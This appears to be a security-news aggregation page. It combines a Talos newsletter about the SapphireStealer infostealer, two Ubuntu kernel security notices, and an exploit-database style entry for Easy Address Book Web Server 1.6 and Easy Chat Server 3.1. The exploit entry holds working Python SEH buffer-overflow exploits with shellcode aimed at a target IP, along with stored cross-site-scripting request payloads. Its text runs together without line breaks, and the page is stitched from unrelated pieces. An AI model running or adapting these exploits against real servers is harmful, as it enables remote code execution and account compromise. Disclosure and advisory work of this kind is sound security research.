A new open-source information stealer called ‘SapphireStealer’ has been observed across public malware repositories with increasing frequency. Plus, watch a new series of videos on the year so far in the threat landscape.

Thursday, August 31, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I’m covering for Jon this week whilst he takes some well-deserved holiday. What’s on my mind this week? Well, apart from a new horror film that I just read about called “Slotherhouse” where the killer is, um, a sloth (I predict nothing but a masterpiece), there are a couple of things on my mind relating to open-source.

Firstly, on the bad actor side of things, we’re seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SaphireStealer” which you can read about below.

When I spoke to Cisco Talos’ Head of Outreach, Nick Biasini, about the biggest trends 2023 so far, he called out how attackers are increasingly using malicious open-source tooling. This has been a large part of the reason we are seeing a continuous fracturing of the ransomware and extortion landscape, as threat actors find what they need online, and then adapt these tools to suit their needs, and in many cases add on anti-detection mechanisms.

Speaking of 2023 trends, I just uploaded a new playlist of 1–2-minute long videos featuring Nick’s thoughts and explanations on some of the biggest threats we’ve seen so far this year - including the evolution of ransomware, the rise in commercial spyware, and supply chain attacks. Check out the playlist. As a preview, here's Nick talking about the evolution of ransomware in 2023:

On the flip side, open-source is of course one of the most important ways in which security defenders can learn, upskill, and share their findings with the community. That’s one of the reasons why Talos creates and releases open-source software, for free.

Just in case you don’t know about our open-source tools, which have been developed by some of the smartest brains on the planet, you should check them out. We have around 27 tools which are available to download on our website at talosintelligence.com/software and on GitHub. The latest and greatest of these is the NIM-IDA-FLIRT Generator tool.

Oh, I just read that “Slotherhouse” will not only feature a killer sloth, it’s called Alpha, and their weapon of choice is a samurai sword. One ticket please.

****The one big thing****

SapphireStealer, an open-source information stealer, has been increasingly observed across public malware repositories since its initial release in December 2022. SapphireStealer is an example of a new type of information stealer, which is mostly designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information.

While infostealers have been around for a very long time, Talos has recently seen an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces.

**Why do I care?**

As is often the case following the release of a new open-source malware codebase, threat actors have acted quickly, and began to experiment. Some threat actors have even extended SaphireStealer to support added functionality, and used other tooling to make the detection of SapphireStealer infections more difficult (again, another increasing trend that we’re seeing across the threat landscape). Infostealers remain a popular choice for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information to adversaries.

**So now what?**

A comprehensive blog written by Edmund Brumaghin covers the background behind SapphireStealer, and our research on the tool, including a case study where we saw multiple failures on the part of the threat actor to maintain sound operational security. The blog includes Snort SIDs, and indicators of compromise.

****Top security headlines of the week****

*   **Operation “Duck Hunt" proactively removes Qakbot malware from 700,000 infected machines.** In one of the largest operations of its kind, federal law enforcement took decisive action against one of the most widely used and longstanding botnets. According to the U.S Department of Justice, these efforts resulted in Qakbot being “neutralized” from hundreds of thousands of devices. According to TechCrunch, “The Department of Justice also announced the seizure of more than $8.6 million in cryptocurrency from the Qakbot cybercriminal organization, which will now be made available to victims”. Dark Reading TechCrunch
*   **What’s in a name? Strange behaviors at top-level domains creates uncertainty in DNS.** When Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, it ignited a firestorm of controversy as security organizations warned against the confusion that was certain to occur. Talos researcher Jaeson Schultz recently wrote about the consequences of Google’s decsion, including how, in the worst case scenario, confusion over whether some name is a public DNS name, or another private resource can cause sensitive data to fall into the hands of unintended recipients. Talos blog.
*   **OpenAI rolls out a business edition of ChatGPT, promising “enterprise-grade security”**. OpenAI says it is making a commitment not to use client-specific prompts and data in the training of its models. SecurityWeek writes that “the security-centric features of the new ChatGPT Enterprise are meant to address ongoing business concerns about the protection of intellectual property and the integrity of sensitive corporate data when using LLM (large language model) algorithms.” SecurityWeek

****Can’t get enough Talos?****

*   Beers with Talos Ep. #138  “I’m going to breach you off.” “Not if I breach you off first!” (Where Barbie meets offensive security)
*   Talos Takes Ep. #152 Carrying out incident response in-person vs. virtually (hear about the positives and negatives of each approach)
*   Blog: Black Hat USA 2023 NOC: Network Assurance (a great write up about how Cisco and Talos helped to protect the network during Black Hat USA 2023).
*   Security Stories Ep. #69 Preparing for a cybersecurity incident, with Jeremy Maxwell (hear from a Cisco Talos Incident Response customer about how his organization proactively prepares for cybersecurity incidents within a highly regulated industry.

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

_Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit._

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

_Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

_Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

****Most prevalent malware files from Talos telemetry over the past week****

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6

MD5: 4c9a8e82a41a41323d941391767f63f7

VirusTotal: https://www.virustotal.com/gui/file/1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6/details

Typical Filename: !!Mreader.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Generic::sheath

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b

MD5: f5e908f1fac5f98ec63e3ec355ef6279

VirusTotal: https://www.virustotal.com/gui/file/7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b/details

Typical Filename: IMG001.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Coinminer::tpd

New open-source infostealer, and reflections on 2023 so far

Ubuntu Security Notice 6325-1 - Daniel Moghimi discovered that some Intel Processors did not properly clear microarchitectural state after speculative execution of various instructions. A local unprivileged user could use this to obtain to sensitive information. Tavis Ormandy discovered that some AMD processors did not properly handle speculative execution of certain vector register instructions. A local attacker could use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6325-1  
August 31, 2023

linux-gkeop-5.15, linux-intel-iotg vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems

Details:

Daniel Moghimi discovered that some Intel(R) Processors did not properly  
clear microarchitectural state after speculative execution of various  
instructions. A local unprivileged user could use this to obtain to  
sensitive information. (CVE-2022-40982)

Tavis Ormandy discovered that some AMD processors did not properly handle  
speculative execution of certain vector register instructions. A local  
attacker could use this to expose sensitive information. (CVE-2023-20593)

Ye Zhang and Nicolas Wu discovered that the io_uring subsystem in the Linux  
kernel did not properly handle locking for rings with IOPOLL, leading to a  
double-free vulnerability. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-21400)

It was discovered that the universal 32bit network packet classifier  
implementation in the Linux kernel did not properly perform reference  
counting in some situations, leading to a use-after-free vulnerability. A  
local attacker could use this to cause a denial of service (system crash)  
or possibly execute arbitrary code. (CVE-2023-3609)

It was discovered that the netfilter subsystem in the Linux kernel did not  
properly handle certain error conditions, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3610)

It was discovered that the Quick Fair Queueing network scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3611)

It was discovered that the network packet classifier with  
netfilter/firewall marks implementation in the Linux kernel did not  
properly handle reference counting, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-3776)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle table rules flush in certain circumstances. A local  
attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-3777)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle rule additions to bound chains in certain  
circumstances. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2023-3995)

It was discovered that the netfilter subsystem in the Linux kernel did not  
properly handle PIPAPO element removal, leading to a use-after-free  
vulnerability. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2023-4004)

Kevin Rich discovered that the netfilter subsystem in the Linux kernel did  
not properly handle bound chain deactivation in certain circumstances. A  
local attacker could possibly use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-4015)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1038-intel-iotg  5.15.0-1038.43  
   linux-image-intel-iotg          5.15.0.1038.37

Ubuntu 20.04 LTS:  
   linux-image-5.15.0-1026-gkeop   5.15.0-1026.31~20.04.1  
   linux-image-gkeop-5.15          5.15.0.1026.31~20.04.22

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6325-1  
   CVE-2022-40982, CVE-2023-20593, CVE-2023-21400, CVE-2023-3609,  
   CVE-2023-3610, CVE-2023-3611, CVE-2023-3776, CVE-2023-3777,  
   CVE-2023-3995, CVE-2023-4004, CVE-2023-4015

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1038.43  
   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1026.31~20.04.1

Ubuntu Security Notice USN-6325-1

Easy Address Book Web Server version 1.6 suffers from buffer overflow and cross site scripting vulnerabilities.

# Exploit Title: Easy Address Book Web Server v1.6 - MultipleVulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-10# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html# Software Link : http://www.efssoft.com/eabws.exe (md5sum:69f77623bb32589fb5343f598b61bbd9)# Tested Version: 1.6# Tested on:  Windows 7, 10# CVE-2023-4491: Vulnerability Type: searchbook Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6.By sending an overly long username string to /searchbook.ghp for asking thename via POST, an attacker may be able to execute arbitrary code.Proof of concept:import socketimport structdef sendbuff():    # > arwin.exe kernel32.dll WinExec    # WinExec is located at 0x776f2c91 in kernel32.dll    shellcode_WinExec = ("\x33\xc0"                          # XOR EAX,EAX"\x50"                              # PUSH EAX      => padding for lpCmdLine"\x68\x2E\x65\x78\x65"              # PUSH ".exe""\x68\x63\x61\x6C\x63"              # PUSH "calc""\x8B\xC4"                          # MOV EAX,ESP"\x6A\x01"                          # PUSH 1"\x50"                              # PUSH EAX"\xBB\x91\x2c\x6f\x77"              # MOV EBX,kernel32.WinExec"\xFF\xD3")                         # CALL EBX    shellcode_system = (        "\x31\xC9"                # xor ecx,ecx        "\x51"                    # push ecx        "\x68\x63\x61\x6C\x63"    # push 0x636c6163        "\x54"                    # push dword ptr esp        "\xB8\x6f\xb1\xdc\x75"    # mov eax,msvcrt.system        "\xFF\xD0")               # call eax    shellcode = shellcode_WinExec    # SEH    junk1 = "A"*455    buffer =  junk1    buffer += "\xeb\x10\x90\x90"            # jmp 0x10 to nops to shellcode    buffer +=  struct.pack('<L',0x1001071e) # pop/pop/ret @ 0x1001071eSSLEAY32.DLL from !Mona 0x1001071e    buffer += "\x90" * 20    buffer += shellcode    junk2 =  "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)    buffer += junk2    return bufferdef REQ_POST (padding):    POST = (    "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0\r\n"    "Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"    "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"    "Content-Type: application/x-www-form-urlencoded\r\n"    "Content-Length: " + str(108 + len(padding))+ "\r\n"    "Connection: keep-alive\r\n"    "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"    "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"    "Upgrade-Insecure-Requests: 1\r\n"    "Host: "+str(ip)+"\r\n\r\n"    "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding+"&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"    )    return POSTip = '192.168.X.X'port = 80payload = sendbuff()try:    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address BookWeb Server V1.6, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_POST(payload))    s.recv(1024)    s.close()    print "\n[*] Sended POST length " + str(len(payload))except:    print "Connecting error"# CVE-2023-4492: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /addrbook.ghp (POSTmethod), in multiple parameters.Proof of concept:POST http://localhost/addrbook.ghp?id=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 475Origin: http://localhostConnection: keep-aliveReferer: http://localhost/editcontact.ghp?id=1&cid=12Cookie: SESSIONID=15337; UserID=; PassWD=Upgrade-Insecure-Requests: 1Host: localhostaddrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=SaveVulnerable parameters: firstname, homephone, lastname, middlename,workaddress, workcity, workcountry, workphone, workstate, workzipResponse: <TR>              <TD class=row2><SPAN class=genmed><A target=_blankclass=genmed href="viewcontact.ghp?id=1&cid=12">demo1</a><script>alert(1);</script><a> demo1</A></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><a href="mailto:demo1@demo1.com">demo1@demo1.com</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed>demo1, , , ,USA</SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>              <TD class=row2 align=left><SPAN class=genmed><ahref="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1</a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD># CVE-2023-4493: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Address Book Web Server v1.6, does notsufficiently encode user-controlled inputs, resulting in a storedCross-Site Scripting (XSS) vulnerability via the /users_admin.ghp (POSTmethod, authenticated Admin user), in multiple parameters.Proof of concept:Example 1:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 134Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=UpdateVulnerable parameter: emailResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value="test"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>Example 2:POST http://localhost/users_admin.ghp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 144Origin: http://localhostConnection: keep-aliveReferer: http://localhost/users_admin.ghpCookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>Upgrade-Insecure-Requests: 1Host: localhostuserid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=UpdateVulnerable parameter: usernameResponse:<form method="POST" action=""><TR><input type="hidden" name="userid" value="2"><TD class=row2 align=left><input type="text" name="username" size="15"value=""><script>alert(1);</script>"> </TD><TD class=row2 align=left><input type="text" name="password" size="15"value=""> </TD><TD class=row2 align=left><input type="text" name="email" size="35" value="tt@fsdfs.com"> </TD><TD class=row2 align=left><select name="level"><option>guest</option><option selected>user</option><option >poweruser</option></select></TD><TD class=row2 align=left><select name="state"><optionselected>Enable</option><option >Disable</option></select></TD><TD class=row2 align=left><input type="submit" value="Update"name="update_user"></TD><TD class=row2><SPAN class=genmed><A class=genmedhref="user_delete_admin.ghp?2">Delete</A></SPAN></TD></TR></form>-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities# Discovery by: Rafael Pedrero# Discovery Date: 2021-01-09# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497# Vendor Homepage: http://www.echatserver.com/# Software Link : http://echatserver.com/ecssetup.exe (md5sum:c682138ebbea9af7948a3f142bbd054b)# Tested Version: 3.1# Tested on:  Windows 7, 10# CVE-2023-4494: Vulnerability Type: register Remote Buffer OverflowCVSS v3: 9.8CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCWE: CWE-119Vulnerability description: There is a remote stack-based buffer overflow(SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1.By sending an overly long username string to register.ghp for asking theusername via GET, an attacker may be able to execute arbitrary code.Proof of concept:import socketdef sendbuff():    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)    shellcode = (    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +    "\x1c\x39\xbd"    )    # SEH    junk1 = "A"*473    buffer =  junk1    buffer += "\xeb\x06\x90\x90"           # short jmp to shellcode    buffer += "\x1e\x0e\x01\x10"           # pop/pop/ret @ 0x10010E1ESSLEAY32.DLL from !Mona    buffer += shellcode    junk2 =  "D"*(600 - 473 - len(shellcode) - 4 - 4)    buffer += junk2    return bufferdef REQ_GET (padding):    GET = (    "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"    "Host: "+str(ip)+":80\r\n"    "Accept-Language: es-es\r\n"    "Accept-Encoding: gzip, deflate\r\n"    "Referer: http://"+str(ip)+"\r\n"    "Connection: Keep-Alive\r\n\r\n"    )    return GETip = '192.168.X.X' # change the ip addressport = 80payload = sendbuff()try:    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server3.1, length " + str(len(payload))    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    s.connect((ip, port))    s.send(REQ_GET(payload))    s.recv(1024)    s.close()    print "\n[*] Sended GET length " + str(len(payload))except:    print "Connection error"# CVE-2023-4495: Vulnerability Type: stored Cross-Site Scripting (XSS) - #1CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Resumeparameter. The XSS is loaded from /register.ghp.Proof of concept:POST http://localhost/registresult.htm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 257Origin: http://localhostConnection: keep-aliveReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1Host: localhostUserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>Go to:http://localhost/register.ghp?username=<redacted>&password=<redacted>Response - xss:<TR><TD>Your profile/interests:<BR><TEXTAREA rows="4" cols="30"name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA><INPUT type="hidden" name="cw" value="0"><INPUT type="hidden" name="RoomID" value=""><INPUT type="hidden" name="RepUserName" value=""></TD></TR># CVE-2023-4496: Vulnerability Type: stored Cross-Site Scripting (XSS) - #2CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /body2.ghp (POST method), in mtowho parameter.Proof of concept:POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Content-Type: application/x-www-form-urlencodedContent-Length: 248Origin: http://localhostConnection: keep-aliveReferer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4Upgrade-Insecure-Requests: 1Host: localhoststaticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=Response:<html><head></head><body><script language="JavaScript"></script></body></html># CVE-2023-4497: Vulnerability Type: stored Cross-Site Scripting (XSS) - #3CVSS v3: 6.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NCWE: CWE-79Vulnerability description: Easy Chat Server v3.1, does not sufficientlyencode user-controlled inputs, resulting in a stored Cross-Site Scripting(XSS) vulnerability via the /registresult.htm (POST method), in Iconparameter. The XSS is loaded from /users.ghp.Proof of concept:POST /registresult.htm HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)Gecko/20100101 Firefox/70.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 235Origin: http://localhostConnection: closeReferer: http://localhost/register.ghp?username=<redacted>&password=<redacted>Upgrade-Insecure-Requests: 1UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=ChangeResponse:<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has beenchanged successfully.</center></body>When user information page load:http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4&nbsp;<font color="red">[vip room]</font><br><br>[Online users:1]<br><br>[<ahref="javascript:parent.chatsubmit.getname('All');"target="chatsubmit">All</a>]<br><br><script>if(navigator.appName!="Netscape" && parent.chatsubmit.document &&parent.chatsubmit.document.readyState == "complete")parent.chatsubmit.listcolorchange();</script><img src="/images/""><script>alert(111)</script><i>[<ahref="javascript:parent.chatsubmit.getname('<redacted>');"target="chatsubmit"><redacted></a>]<==<br><br><br><br>[<a href="javascript:OnRegister();">Change infomation</a>]</i>

Easy Address Book Web Server 1.6 Buffer Overflow / Cross Site Scripting

Ubuntu Security Notice 6324-1 - Daniel Moghimi discovered that some Intel Processors did not properly clear microarchitectural state after speculative execution of various instructions. A local unprivileged user could use this to obtain to sensitive information. Tavis Ormandy discovered that some AMD processors did not properly handle speculative execution of certain vector register instructions. A local attacker could use this to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6324-1  
August 31, 2023

linux-gkeop vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems

Details:

Daniel Moghimi discovered that some Intel(R) Processors did not properly  
clear microarchitectural state after speculative execution of various  
instructions. A local unprivileged user could use this to obtain to  
sensitive information. (CVE-2022-40982)

